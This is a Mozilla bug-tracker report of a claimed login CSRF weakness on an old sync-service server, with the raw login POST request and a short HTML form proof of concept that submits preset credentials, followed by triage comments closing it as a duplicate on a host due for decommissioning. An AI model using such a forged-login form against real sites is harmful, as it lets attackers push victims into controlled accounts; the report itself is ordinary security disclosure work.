User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 Build ID: 20140410211200 Steps to reproduce: CSRF vulnerability in mozilla URL : https://184.108.40.206/ The Login request doesnot have valid protection against CSRF attacks . Here is the request POST / HTTP/1.1 Host: 220.127.116.11 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://18.104.22.168/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 52 username=abhijeth0423%40gmail.com&password=testadmin CSRF POC : <html> <body> <form action="https://22.214.171.124/" method="POST"> <input type="hidden" name="username" value="email@example.com" /> <input type="hidden" name="password" value="testadmin" /> <input type="submit" value="Submit request" /> </form> </body> </html> Actual results: Using above vulnerability an attacker can make victim to login into some test account and the observing the changes or actions made by the victim . This is prevented by using either an authenticated token or CSRF token . Expected results: The Login form need to be protected with an authentication token as one of the paramters in the Login form . This will prevent CSRF vulnerability .
Assignee: nobody → server-ops
Component: General → Server Operations
Product: Core → mozilla.org
QA Contact: shyam
Version: 28 Branch → other
Please add sec-bounty flag ! Regards
As best I can tell this is the old sync service, and signing in with a test account on the web won't do anything in terms of actually syncing anything behaviour-wise. I also see an SSL cert warning if I use the instructions as written, because the IP address doesn't match the cert. Going to https://services.mozilla.com/ doesn't show the same page as ignoring the cert warning. In other words, I'm not sure there's anything to be worried about here. Richard, can you clarify some more?
Yeah, that machine is account01.phx.services.mozilla.com, which will be decommissioned soon. And this is a dupe.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → DUPLICATE
Summary: CSRF vulnerability in mozilla subd-domain → CSRF vulnerability in accounts.services.mozilla.com
Duplicate of bug: 772818
Product: mozilla.org → mozilla.org Graveyard
You need to log in before you can comment on or make changes to this bug.